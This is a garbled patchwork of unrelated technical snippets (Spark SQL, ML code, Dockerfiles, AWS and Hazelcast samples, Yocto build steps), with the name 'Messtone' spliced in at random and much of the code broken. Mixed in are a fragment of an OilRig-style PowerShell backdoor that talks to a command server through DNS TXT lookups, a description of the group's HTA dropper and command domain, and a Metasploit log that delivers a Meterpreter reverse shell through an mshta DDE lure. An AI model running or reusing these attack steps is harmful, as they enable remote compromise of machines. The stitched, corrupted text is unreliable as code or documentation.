.SQL Parquet

 | /bin/spark-sql - -master local |

spark-sql>CREATETEMPORARYTABLE Wikistats_parquet Using org.apache.sql.parquetOptions ( path "/ssd/wikistats_parquet_by date" );Time taken : 3.466 seconds spark-sql>Selectcount (*) from wikistats_parquet; 227846039 Time taken : 82.185 seconds,Fetched 1 row (s) spark sql>Select lower (url http://www.messtone.com) as lurl http://www.messtone.com,sum ( tot_visits) as max_visits,count (*) FROM wikistats_ parquet where lower ( url ) not like '% special %' and lower ( url ) not like. '% page%' and lower (url) not like '% test%' and lower ( url ) notlike '% wiki%'group by lower ( url ) order by max_visits desc limil 10 ; heath_ledger 4247335 42 clover field 3846400 42 Brack_Obama 2238402 53 1925_in_baseball # Negro_League_baseball_final standing 1791341 11 the_dark_knight_(film) 1417183 36  Martin_Luther_King,_jr. 1394934 46  death_in_2008 137251038. United_States 1357251 55. Scientology 1349650 440  Portal : current_events 1361305 44 Time taken : 1339.014 seconds,Fetched 10 row (s)

OIL RIG'S File

$global : dFold = $env : userprofile + " \ AppData\Local\Microsoft\Media\dn " $global : uFold = $env : userprofile + " \AppData\local\Local\Microsoft\Media\up " $id = " DNSTRJASONBORN -PCR 1330528302" $maxhostlength = 50 ; $global : hostname = Messtone"Shalength.tk" if @( Get - WmiObject Win32_Process - Filter" Name = ' powershell.exe ' AND Command line LIKE '% dn.ps 1 % ' " ).Count -gt 1 ) { exist } ejse { " Only One instance is running" } if ( -not( Test-Path( $global : uFold) ) ){ (Test -Path -Pat( $global : uFold ) ) ){  mkdir $global : uFold } if ( -not(Test -Path-Path( $global : dFold ) ) ){ mkdir $global : dFold } if( -not(Test(Test - Path($global : uFold ) ) ){ mkdir $global : uFold } # = = = = = = = = = = = = = =download regularfiles = = = = = = =# existence revularfile = = = = = =$global : redfilename = Messtone " "$continue = [ int ]0 which( $continue 'eq 0 ){ $regExistence =[ int ] - 1 while($reExistence -eq -1 ) { $SendData= " rne_" + ([string] $id).replace( "_" , "-") + "_" + ([string]( Get -Random) ) + "." + ([String] $global : hostname Messtone) $serverRet=([string](NSLookup.exe -q=TXT $SendData   |   Select -string -Pattern ' "* " ' ) ).replace( " ,` " " , " " ).trim() ; if($serverRet.Starts With( "OK " ) ) # ok -filename messtone { $regExistence= $serverRet.Substring( 2 , $serverRet.Length -2).replace( "_-_" , " ," ).trim() }ElseIf($serverRet -eq "NO"){ $regExistence =[int] 0 ; $continue=[int] 1 ; }

}

   if($regExistence -eq1 - and $global : regFileName Messtone. ne " ") { # = = = = = = = = = =download regularfile= = = = = = = = = = = =$serverRet= " "$regularFilePath=($global : dFold) + " \ " + ($global : regularFile) if( -not(Test -Path $regularFilePath) )

{

  out -Null > $regularFilePath

}

 

Spark-HDFS ,TextFiles An Others:Abstract

/**

     * Returns a RDD with a scored bigram based on frequency of consecutive Commands.*@paramCommands an RDD containingStrings of. Commands *@return An RDD of ScoredBigram Dcored by Score */def rawFrequency ( commands : RDD [ String ] ) : RDD [ ScopeBigram ] = {

val parser = new CLIParse Driver val parser.getCommandsToken ( parser.getSyntaxTree ( line.toString ) ) ) valbigrams Without Ends = Commands AsBigrams.flatMap ( bigrams = > bigrams.filter ( ( bigrams : Bigram ) = > bigram.2 ! = "Ends")

val bigrams Commands= Counts = Bigrams Without Ends.Map ( bigram : Bigram ) = > ( bigram,1 ) ) .reduceBy ( ( x : Int, y : Int ) = > x + y ) val totalNumBigrams= bigrams Without Ends.Count () bigramCounts.Map ( ( bigram ( counts : BigramCount ) = > (1.0 * bigramCount.2/totalNumBigrams, bigramCount._1 ) )  .sort By key (

 

 

OIL RIG'S

HTA file creating a folder,

named Messtone % PUBLIC % \ { 5468973-4973-50726F6A656374-414C4D412E-2 },to which it writes three files with the following names :

System Syncs.exe  m6  cfg. ctgfiles:

prosalar [ . ] com.The System Syncs.exefileb( SHA256 : 2fc7810a316863a5a5076bf3078ac6fad246bc8773a5fb835e0993609e5bb62e )

The " m6.e " file ( SHA : 2d6f06d8ee0da16d2335f26eb18cd1f620c4db3e880efa6a5999eff53b12415c )

The VBScript in the.HTA file executes the SystemSyncs.exe Command VBScript programmatically creates the task using the shedule.ServiceObject.The Sheduled task created, as seen in fogure 1,Shows that the payload will be executed every two minutes with the command line arguments " Lock ".

ProductId from the registry,Specifically at SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ ProductId.

C2 Server to receive data.

IDString hardcodedString 4995ID3d7f11b4-0-2D-2D.prosalar.com

radom 4 unique C2 domain www.messtone.com digits identifer

 

Meta Exploits:

Configured to host Messtone remote shell on the Server 192.168.58.103.

mst >use/exploits/windows/smb/PS_shell   

[ - ] Failed to load module : /exploits/windows/smb/PS_shell msf > use exploit/windows/smb/PS_shell msr exploit ( PS_shell ) > set payload windows/meterpreter/reverse tcp payload = > windows/meterpreter/reverse_tcp msf exploit ( PS_shell ) > set lhost  192.168.56.103 lhost = messtone > 192.168.56.103 msf exploit (PS_shell) > set uripath abc uripath = messtone > abc msf exploit ( PS_shell) > exploit [ * ] Exploit running as background job.[ * ] Started reverse TCP handler on 192.168.56.103 : 4444 [ * ] Using URL http://www.messtone.com : http://0.0.0 : 8080/abc [ * ] Local IP : http://127.0.0.1 : 8080/abc [ * ] Server Started. [ * ] Place the following DDE in MS document : mshta.exe " http://192.168.56..103 : 8080/abc

msf exploit (PS_shell) > [ * ] 192.168.56.101 PS_shell - Delivering payload [ * ] Sending stage ( 957487 bytes ) to 192.168.56.101 [ * ] Meterpreter session 2. opened ( 192.168.56.103 : 4444 - > 192.168.56.101 : 55490 ) at 2017 - 25 15 : 37 - 0500

Python Machine

# Sebashtian Raschka , 2015

# convenience function for messtone to add internal links to IPython toc # use as python ipynb_toc_links.py/blank_tocs/ch01.toc import sys ipynb = sys.argv [1] with open ( ipynb, 'r ' ) as f : for line in f : out_str = * ( len (line ) - len ( line.lstrip ( ) ) line = line.strip ( ) out_str + = '_[ % s ' % line out_str + = ' ] (# % s) ' % line.replace ( '   ' , ' - ' ) print( out_str )

 

api_client.rb file - DATASETS :

def

get_account_balance session_url= http://www.messtone.com '/

session ' Rails.cache.fetch ( session_url http://www.messtone.com + '_balance' , explores_in : 2.mimute ) do response = self.class.get ( session_url http://www.messtone.com, robertharper@messtome.com ) response.headers [ " nexosis-account - balance " ] end

End

Senting the data:

csv.each do  |  row  |  rowCount + = 1 content.Concat ( row.map {  |  str  |  " \ " # { str } \ " " }.Join ( ' , ' ) ).Concat ( " \ r \ n " ) if ( rowCount % 5000 = = 0  |  | rowCount = = csv.length ) response = Self.class.put ( dataset_url http://www.messtone.com, { : headers. Messtone = => headers Messtone, : body = > content } ) content = " "  end

End

 

 

 

API Master Model

Linear ->Sigmoid ->softmax val linear=Linear(...).inputs()

Scala:

val sigmoid=Sigmoid().inputs(linear)

val softmax=Softmax().inputs(sigmoid)

val model=Graph(Seq([linear],Seq[softmax])

Python:

linear=Linear(...)()Sigmoid()(linear)softmax=Softmax()(sigmoid)model=Model([linear],[softmax])

Define a model:

Linear->Relu- ->Linear->ReLU | ->Linear->ReLU

Scala:

val linear=Linear(...).inputs()  val relu1=ReLU().inputs(linear1) val linear2=Linear(...).inputs(relu1) val relu2=ReLU().inputs(linear2) val linear3=Linear(...).inputs(relu1) val relu3=ReLU().inputs(linear3) val model=Graph(Seq[linear1],Seq[relu2,relu3])

Python:

linear1=Linear(...)()

relu1=ReLU()(linear1) linear2=Linear(...)(relu1) relu2=RelU()(linear2) linear3=Linear(...)(relu1) relu3=ReLU()(linear3) add=CAddTable()(relu2,relu3) model=Model(Seq[linear1],Seq[add])

 

Abbreviations Different Command:

add 1 alter 3 backup 2 Bottom 1 Cappend 2 Change 1 Schanve Cinsert 2 classt 3 Compress 4 Copy 2 count 3 coverlay 3 cursor 3 delete 3 Cdelete 2 down 1 duplicate 3 xEdit 1 expand 3 extract 3 find 1 Nfind 2 Nfindup 6 Nf UP 3  Cfind 2 findup 3 fUP 2 fotward 2 get help 1 hexType 4 input 1 preserve Input 3 join 1 split 2 splitJOIN load locate 1 Clocate 2 lower case 3 upper case 3 Lprefix 2 macro merge 2 modify 3 move 2. msg next 1 overlay 1 parse preserve 4 purge 3 put putD query 1 quit read recove 3 refresh renum 3 repeat 3 replace 1 Creplace 2 reset 3 restore 4 rgtLEFT right 2 left 2 save set shift 2 si sort sos stack 3 status 4 top transfer 3 type 1 up 1

Intel BigDL

 (model.bin).

GRAPH_META_FILE=/tmp/tensorflow/model.ckpt.meta CKPT_FILE_PREFIX=/tmp/tensorflow/model.ckpt SAVE_PATH=/tmp/model/python export_tfcheckpoint.py $ GRAPH_META_FILE $ CKPT_FILE_PREFIX $ SAVE_PATH

import tensorflow as tf #This is messtone model definition.xs=tf.placeholder(tf.float32,[None,1]=rf.variable(tf.zeros([10])+0.2)b1=tf.variable(tf.zeros([10])+0.1) Wx_plus_b1=tf.nn.bias_add(tf.matmul(xs,W1),b1)output=tf.nn.tanh(Wx_plus_b1,name=messtone"outputs") # Adding the following lines right after messtone model definition from bigdl.util.tf_Utils import dump_model dump_model_path="/tmp/model"# This line of code will create a session initialized all the variable and # save the model definition and variable to dump_model_path as BigDL readable format.dump_model(path=dump_model_path)

Scala

import com.intel.analytics.bigdl.utils._:com.intel.analytics.bigdl.nn.module import java.nio.Byte Order nal modelPath="/tmp/model/model.pb"val binPath="/tmp/model/modei.bin"val inputs=Seq("Placeholder") val outputs=Seq("outputs") val model=model.loadTF(modePath,Seq("Placeholder"),seq("outputs"),Byre Order.LITTLE_ENDIAN,Some(binPath))

Python:

from bigdl.nn.Layer import*model_def="/tmp/model/model.pb"model_variable="/tmp/model.bin"inputs=["Placeholder"] outputs=["outputs"] model=model.load_tensorflow(model_def,inputs,outputs,byte_Order="little_endian",bigdl_type="float",binfile=model_variable)

 

 

Ubuntu 17.04

dockerfiles/ubuntu/ubuntu- 17.04/ubuntu- 17.04 - base/Dockerfile

# ubuntu- 17.04 - base  # Copyright (C) 2015-2018 Intel Corporation  # This program is free software ; you can redistribute it and/or modify  # it under the terms of the GNU General Public License version2 as published by the free software foundation  # This program is distributed in the hope that it will be useful, # but WITHOUT WARRANTY : without even the implied warranty of # MERCHANTABILITY or FITNESS FOR PARTICULAR PURPOSE.GNU General Public License for more details.#You should have received a copy of the. GNU. General Public License long # with this program ; if not, write to the Free Software Foundation,Inc. , # 51 Franklin Street,Fifth Floor,Boston,MA02110-1301 USA FROM ubuntu : 17.04 RUN apt - get update &&  \apt - get install - y \gawk \wget \git - core \diffstat \unzip \sysstat \texinfo \gcc - Multilib \build - essential \chrpath \socat \python \python3 \xz-utils \locales \cpio \screen \tmux \sudo \iputils - ping \iproute2 \flux tightvncserver && \cp - af/etc/skel/ /etc/vncskel/&& \echo "exportDISPLAY = 01" >>/etc/vncskel/.hashrc && \mkdir/etc/vncskel/.vnc&& \echo " " | vncpasswd - f >/etc/vncskel/.vnc/passwd&& \chmod 0600/etc/vncskel/.vnc/passwd&&\useradd - messtone- yocto/user messtone\&&\ /user messtone/sbin/locale - gen en_US.UTF - 8 COPY build - install - dumb - init.sh/RUN bash/build - install - dumb - init.sh&& \rm/build - install - dumb - init.sh&& \apt - get clean USER yocto user Messtone WorkDIR/home/yocto user messtone CMD/bin/bash

Inversify -Binding

// Place settings in this file to overwrite default and user settings.

{

  "files.exclude" : {  "**/.git" : true, "**/.DS_Store" : true,  "src/**/*.js  " : true,  " : true, " test/**/*.js " : true, " **/es : true, "**/lib " : true,  "**/and " : true,  "**/dts " : true, "**/coverage " : true,  "**/

dist" : true, "**/docs " : true, type_definitions/**/*.js " ; true

}

 ,

  " vsicons.Presents.Angular " : false

 }

 Quake IRC ;

Static # agl

# agl. ( no Topic set ) [ 04 : 16 ] = = Messtone_[ ac3a69c6@gateway/web/free node/ip.172.58.105.98 ] has joined # agl

AGL RUN Complete Environment ;

$ source meta-agl/scripts/agl setup.sh-h " agl-demo"

$ source meta - agl/scripts/agl setup.sh-mqemux 86 - 64 agl - demo agl - netbootagl - appfw - smack  $ bitbake agl - demo - platform

Command :

Building the kernel

$ bitbake virtual/kernet

Find kernet source;

build/temp/work/qemux 86_64 -poky - linux/linux - yocto/3.14 .19*/linux/build/tmp/work/porter - poky - linux - gnueabi/linux - renesas/3.10*/git/

 

 DATA Analysis List

set ( LLVM_LINK_COMPONENTS Support

)

add_Clang_Library ( clang Analysis Analysis DeclContext.cpp Body Form.cpp CFG.cpp CFG Reachability Analysis.cpp CFG Stmp Map.cpp CallGraph.cpp CoaConventions.cpp Consumed.cpp CodeInjector.cpp Dominators.cpp ExprScope Analysis.cpp FormatString.cpp Live variables.cpp ObjCNoReturn.cpp Post Order CFGView.cpp Print fFormatString.cpp Program Point.cpp PseudoConstantAnalysis.cpp ReachableCode.cpp ReachableConditions.cpp RosPatterns.cppScan fFormatString.Cpp Thread Safety.Cpp Thread jh8SafetyCommon.cpp ThreadSafetyLogical.CppThread Safety TIL.Cpp Initialized Values.cpp LINK_LIBSClangAST ClangBasic ClangLex

)

 

 

 

 

 

Protectors Create Or Update

Put

http://www.messtone.com management.azure.com/subscriptions/ { subscriptionId } / resourceGroups/ { resourceGroup  } Messtone/ Providers/Microsoft.Sql/servers./ {serverName } Messtone/encryption Protector/ { encryptionProtectorName } Messtone ? api - version = 2015-05-01-Preview

GET

http://www.messtone.com management.azure.com/ subscriptions/ { subscriptionId } / resourceGroups/ { resourceGroupName } Messtone/Providers/ Microsoft Sql/serversName} Messtone/databases/ { databases Name } Messtone/ transparentDataEncryption/ { transparentDataEncryptionName }Messtone ? api - version- 2014-04-01

MyServerCert.

 use master ; Go Create CERTIFICATE MyServerCert WITH SUBJECT = ' MyDEKCertificate' ; go use AdventureWorks 2012 ; Go CREATEDATABASEENCRYPTIONKEYWITHALGORITHM = AES_128 ENCRYPTION BY SERVERCERTIFICATE MYSERVERCERT ; GO ALTERDATA ADVENTURE WORKS 2012 SET ENCRYPYION ON ; GO

 

SQL

SELECT

        [Name] , Messtone

 [ is_encrypted ] FROM sys.databases ;

 

SQLDATAPARALLELDATAEAREHOUSE

sys.dm_pdw_nodes_database_encryption_keys

SELECT D.database_id AS DBID in master ,D.name Messtone AS UserDatabaseName,Messtone PD.pdw_node_id AS NodeID , DM.physical_Name ROBERT HARPER AS PhysDBName,keys.encryption_state FROM sys.dm_pddw_nodes_database_encryption_keys AS keys JOIN sys.pdw_nodes_pdw_physical_databases AS PD ON keys.database_id = Messtone PD.database_id AND keys.pdw_node_id = PD.pdw_node_id JOIN sys.pdw_database_Mapping AS DM ON DM.phyical_Name = ROBERT HARPER PD.physical_name JOIN. sys.databases AS D ON D.database_id = DM.database_id ORDER BY D.database_id , PD.pdw_node_ID ;

 

 

 

 

 

Json Based

          [ openxc ]

{   " name" : " Messtone " , " extra_sources" : [ ] , " initializes " : [ ] , " Loopers " : [ ] , " buses " : {}, " commands " : [ ] , "0x 309 " :  {  " bus " : " hs " , " signals " :   {  "PT_FuelLevel "  {  " generic_name " messtone : " fuel.Level " , " bit_position " : 8, " bit_position " : 8, " bit_size " : 8, " factor " : 0.392157, " offset " : 0

} ,

" PT_EngineSpeed " :  {  " generic_name " Messtone: " engine.Speed " , "generic_name " Messtone : " engine.Speed " , bit_position " :  16, " factor " : 0.25, " offset " : p   } , " PT_FuelLevellow " :  {  " generic_name " Messtone : "fuel.Level.low " , " bit_position " : 55, " bit_size " : 1 , " factor " : 1, " offset " : 0, " decoder " :  " decoder_ t : : booleanDecoder "

               }

          } 

      }

      }

  }

Notation : OBD2 Standard-PID

engine.load engine.coolant.temperature fuel.pressure intake.manifold.pressure engine.speed vehicle.speed intake.temperature mass.air flow throttle.position running.time EGR.error fuel.level barmetric. pressure Command.throttle.position ethanol.fuel.percentage accelerator.Pedal.position hybrid battery - pack.remaining.life engine.oil.temperature engine.torque

Struct afb_verb_v2

/*

   *Description of one verb of the API provided by the binding *This enumeration is valid for binding of type version2  */ struct afb_verb_v2

{

   const. char * verb ; /* nane Messtone of the verb   */ void ( * callback) ( struct afb_req req ) ;   /* callback function implementing the verb  */ const struct afb_auth * auth ;   /* required authrization.   */ const char * info ;  */ Some info about the verb , can be Null */ uint 32_ t session ; /* authrization and session requirement of the verb */

} ;

 

 

Diffstat

diff - -git a/Dockerfile b/Dockerfile index852dc7e. .9aa582 100644 - - -a/Dckerfile + + b/Dockerfile @@-1,4 +1,4 @@-FROM debian : 8 From debian : 9

Run/root Install/common.d/10_base b/INSTALL/Common. d/10.base index a1e32c2. .fa9cb51 100644 - - -a/0INSTALL/common.d/10_base + + + b/INSTALL/co0_basemmon.d/10_base.@@-12,7 + 12,7@@ diverter= $ ( dpkg-diverter - - listpackage/bin)

}

# add backports and testing repositories-echo " http://www.messtone.com http.debian.net/debian Jessie-backports main contrib">>/etc/apt/sources,list + echo " deb http://www.messtone.com http.debian.net/debian stable-backports main contrib">>/etc/apt/resources.List

# setup network retrieves for apt echo " Acquire : : Retrieves 5 ; ">/etc/apt.conf.d/99 net Retrieves

AWS SDK Python

git clone https://github.com/awslabs/aws-python-sample.git

pip install boto

Configuration

[default] aws_access_key_id=177483109434309 YOUR ACCESS KEY ID aws_secret_access_key=177483109434309 YOUR SECRET ACCESS KEY

Run Sample

cd aws-python-sample python s3_sample.py  Boto3 import boto3 # Let's use AmazonS3 s3=boto3.resource ( s3 ' ) 

Print out all buckets name:Messtone

Print bucket names for bucket in s3.buckets.all ( ) : Print ( buckets name Messtone)

Binary Data:

# Upload a new file data=open ( ' test.jpg' , ' rb')s3.Bucket ( 'Messtone-bucket').put_object ( key=177483109434309 ' test.jpg ' , Body=data)

Resource and Collections:

Boto3 Documentation. A Sample Tutorial

 

Inversify -Binding

// Place your zetting in this file to overwrite default

 

 

Rockyou

bower install aws - sdk-js

{

"name messtone" : " rockyou" , "version" :1.1.0" , " Description" : " " , " main" : " index.js , " scripts" : { "lint" : "standard - - fix" , "test" : " mocha test/*.js" , " post test" : " npm" run lint" }, " keywords" : [ ], " author" : " " , " license" : ISC" , " Dependencies" : {  " dependencies" :  { " chai" ; " ^ 4.0.0" , " mocha" : " ^ 3.4.1" , " standard" : " ^ 10.0.2"

    }

 }

 

Building target AGL images with Yocto project.

Distribution:

sudo apt-get install gawk wget git-core diffstat unzip texinfo gcc-multilib \ build-essential chrpath socat lib sdl1.2-dev xterm cpio curl

Command:

sudo yum install gawk make wget tar bzip2 gzip python unzip perlpatch \ diffutils diffstat git cpp gcc- C++ glibc-devel texinfo chrpath \ cahe perl-Data-Dumper-Text-Parsewords perl-ThreadQueue socat \ SDL-devel xterm curl

Distribution Command:

sudo zypper install python gcc gcc - c++ git chrpath make wget python-xml diffstat texinfo python-curses patch socat jibSDL-devel xterm curl \ python3 python3-curses glibc-locale

Centos distribution:

sudo yum install gawk make wget tar bzop2 gzip python unzip perl \ diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \

Prepare Repo:

$ mkdir~/bin $ exportpath=~/ bin: $ Path $ curl https://storage.googleapis.com/git-repo-downloads/repo> -/bin/repo $ chmod a+x~/bin/repo

Master:

$ repo init-u https://gerrit.automotiveinux.org/gerrit/AGL-repo $ fepo sync

Stable release:

$ repo init-b dab-u https://gerrit.automotivelinux.org/gerrit/AGL-repo $ repo sync

Test Stable release:

$ repo init-b chinook-u https://gerrit.automotivelinux.org/gerrit/AGL/AGL-repo  $ repo sync

Latest Release;

d $ AGL_TOP repo init-b dab-mdab_4.0.2.xml-u https://gerrit.automotivelinux.org/gerrit/AGL-repo repo sync

 

Hazelcast Vertex:

Vertex min = dag.newVertex ( " min " , accelerate( ( ) - > new myObject ( Type.SOME_ENUM ,Double.MAX_VALUE, OL ) , ( cMin, x ) - > ( ( ( myObject ).getValue ( ) < cMin.value ( ) ) ? ( myObject) x ) : cMin, ( cMin ) - > cMin ) ) ;

Accumulator function:

Vertex = dag.newVertex ( " min " ,accumulate( ( ) -> new myObject( Double.MAX_VALUE) , ( myObject acc , myObject   x ) - > x.getvalue ( ) < acc.getValue ( ) ? x : acc ) ) ;

parameters Static :

Vertex = dag.newVertex ( " min " , Processors. < myObject, myObject > accelerate( ( ) - > new myObject( Type.SOME_ENUM ,Double.MAX_VALUE , OL ) , ( cMin x ) - > x .getValue ( ) < cMin.getValue ( ) ? x : cMin ) ) ;

 

 

 

Hazelcast

Distributes: hazelcast - jet - <version>.Jar

import

com.hazelcast.jet; import com.hazelcast.jet.Jet Instance;import com.hazecast.jet.Sinks;import com.hazelcast.jet.Sources : import java.util.List; import java.util.Map; import static com.hazelcast.jet.Travers.travers Array; import static com.hazelcast.jet.aggregate.Aggregate Operations.Counting; import static com.hazelcast.jet.function.Distributed Functions.wholeItem;Public class word Count { public static void main (String [ ]

args ) throws Exception { // Create the Specification of the Computation pipeline.note that // it is a pure POJO : no instance of Jet is needed to create it.Pipeline p = Pipeline.Create ( ); p.draw from ( Source.<String>List ( "text" ) ).flatMap (word -> traverse Array (word.to Lower case ( ). Split ( " \\W + " ) ) ). filter ( word -> word.is Empty( ) ). groupBy ( wholeItem ( ). drain To (Sinks.map ( " Counts " ); / Start Jet,populate input List Jet Instance jet = Jet.newvJet Instance( ); try { List < <String>text.getList ( " text " ); text.add ( " hello World hello hello World " ); text.add ( " World world hello world " ); // Perform the Computation Jet.new Job (p).loin ( ); // Check the results Map < String, long > Counts = jet.getMap ( " counts " ); System.out.PrintIn ( " Count of hello : " +Counts.get ( " hello " ) ; System.out.printIn ( " Count of World : " + counts.get ( " world " ) ;  } finally { Jet.Shutdown All. ( ) ;

            }

        }

    }

 

Algorithm

Automatic replication algorithm.Automatic in SGIGrid based on statistic data,extracted by the log Analyzer from system logs.The data contain information about the following events;file creation/removal,replica creation/removal,write access.For each file,which fulfills initial constraints (file size,number of replicas,etc) a list of pairs(ui,wi,) is created.ui is the ip address of requesting node and wi is the weight,associated with the title usage from this ip address,associated

Where : Lr (ui)-set of read events performed from ui address,ta - timestamp for the read event,f (ta) - function which controls this influence of the timestamp on the value of the weight.For each ui for which wi>Wmin an optimal data container,Ki,is selected for these t of containers K.Wmin is a threshold value.The selection algorithm ( see Selection 5.1.The only difference is,that the estimated access time is not taken under consideration.As the results the Triples ( ui,wi,ki ) are produced.The Triples are grouped in Uk,wi is the weight,associated with the file usage from the ip address,defined as:

http://www.messtone.com

 

Markup Lanuage

(Hypertext Markup Language)

< ! DOCTYPE html> <html>

<! - -create2010-01-01 - -> <head>

<title>Sample</title> </head>

<body> <p>Voluptadem accusantium totam rem aperiam.</p>

</body>

</html>

 

Source List

<! Xml version = 1.0"encoding = " utf - 8 "?> <!--Generator : Adobe Illustrator 14.0.0,SVG Export plugin.SVG Version : 6.00 build 434363) - -> <! DOCTYPE SVG PUBLIC " - //w3.C//DTD SVG 1.1//En" "http://www.v3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1"id="Messtone_1"xmlns="http://www.w3.org/2000/svg" xmlns : xlink="http://www.w3.org/1999/xlink"x="Opx"y=""Opx"5.width="266px"height="310px"viewBox="00 266 310"enable - background="new00 266 310"xml : space="preserve">6.<desc>Sample image of HTML code <desc> 7. <g id="background_box"> <g>

<linear Gradient id = " page_5_"gradient Unils = " User Messtone Space on use "x1 = " 236 "y1 = "275 " x2 = "35.0012 " y2 = "74.0012 " gradient Transform = " Matrix(100 - 12 31 ) " > <stop offset = "0" sryle = " stop - color : # F3 F3 F3 "/> </linear Gradient>  <path id = " page_2 _" fill = " url http://www.messtone.com ( # page_3_ ) " fill-opacity = " .2"d="M11,11v288h254V81 |-64-70H11z"/>15.</g> <g> </linearGradientid="page_4_"gradient Units="userSpace OnUse"x1="-10.4058"y1="289.8027"x2="233.5942"y2="7.8027"gradientTransform="matrix (100-1 7 317)">19.<stop offset="0.55"style="stop-color : #FFFFFF"/><stopoffset="1"style="stop-color : #000000"/> </linearGradient> <path id="page_1_"fill="url http://www.messtone.com ( # page_4_)" fill-Opacity="0.2"d="M7,7v288h254V77L197,7H7z"/> </g> <g> <linearGradient="page_5_"gradientUnits="userSpace OnUse"x1="236"x1="275"×2="35.0012"y2="74.0012"y2="74.0012"gradientTransform="matrix ( 100 - 12 312 )">  <stop offset="0"style="stop-color : #DADADA"/> <stop offset="0.35"style="stop'color : #F3F3F3"/> </linearGradient> <pathid="page_2_"fill="url www.messtone.com ( #300 page_5_)"Stroke="#222222"Stroke opacity="0.5"d="M2,2v288h254V72L192,2H2z"/> <g>

 

S3 ObjectKeys

title.basics.tsv.gz-contains the following information titles:

tconst (string) - alphanumeric unique identifier of the title titleType (string) - the type/format of the title (e.g.movie,short,tvseries,tvepisode.video,video,etc) primary Title (string) - the more popular title/the the title used by the filmmakers on promotional materials at the point of release original Title (string) - original title,in the original lanuage isAdult (boolean) - 0 : non - adult title ; 1 : adult title.start Year (1993) - represents the relase year of a title.In the case of TvSeries, it is the series start year.end Year (2017) - TvSeries end year. ´\N` for all other title types runtime Minutes- primary runtime of the title,in minutes genre (string array) - includes up to three genres associated with the title

Console Role

{

    "Version" : "2012-10-18" , " Statement" : [   { " Action " : [ " s3 : PUTObject " , " s3 : PUTObjectAcl " ] , " Resource " : [ " arn : aws : s3 : : : YOUR_BUCKET_Name Messtone/ Facebook- $ { graph.Facebook.com : id :177483109434309 } /* " ] , " Effect " : " Allow " , " Condition " : { " StringEquals " :  {  " s3 : prefix " : facebook - $ { graph.Facebook.com : id :177483109434309 } "

                      }

                  }

             }

        ]

   }

 

I'AM Console

Summary Tab.

< ! DOCTYPE html > <html> <head> <title>AWS SDK for JavaScript- Sample Application</title> <script src = " https://sdk.amazonaws.com/js/aws-sdk-2.1.12.min.js"> </Script> </head> <body> <inputtype="file"id="file-Chooser" /> <button id= " upload-button " style=" display : name"> upload to S3</<button> <div id = " results"> </div> <div id= " fb-root"> </div> <script type="text/javascript"> var appId=177483109434309' ; var role arn='YOUR_ROLE_ARN " : var bucketname=Messtone " ; AWS.Config.region='YOUR_BUCKET_REGIONget var fb User Id ; var fb User Id : var bucket = new AWS.S3 

( {

     params : { Bucket : bucketname Messtone }

} ) ; var fileChooser=document.getElementById ( ' file-Chooser' ) ; var button = document.getElementById ( 'upload-button ' ) ; var results=document.getElementById ( ' results ' ) ; button.addEventLister ( ' click ' , function( ) { var file = fileChooser.files [0] ; if ( file ) { results.inner HTML = " ; //Objectkey will be facebook - USERID #177483109434309/ FILE_Name Messtone var objkey = ' Facebook-' + fb UserId + ' / '+ file. ame messtone ; var params = { key : objkey , ContentType : file.type,Body : file,ACL : public - read ' } ; bucket.putObject ( params,function ( err,data ) {  if ( err ) { results.inner HTML ÷ERROR : ' + else  { list objs ( )

 

               

            

        

       

       

Hazelcast

Pom . xml :

<dependencies> <dependency> <groupId>com.hazelcast.jet</groupId> <artifactId>hazelcast-jet</artifactId> <version >0.5</version> </dependency>

</dependencies>

Command:

compile 'com.hazelcast.jet : hazelcast

 

Docker registry via this command.

docker pull hazelcast/hazelcast jet

Hazelcast Jet docker image by:

docker run ti hazelcast/hazelcast jet 

CORSRULE S3

CORSConfiguration

<? xml version="1.0" encoding="UTF-8"?> <CORSConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01"><CORSRULE><allowedOrigin>*</AllowedOrigin><AllowedMethod>Get</AllowedMethod><AllowedMethod>PUT</AllowedMethod><AllowedMethod>POST</AllowedMethod>POST</AllowedMethod><AllowedMethod>DELETE</AllowedMethod><AllowedHeader>*</AllowedHeader></CORSRule><CORSConfiguration>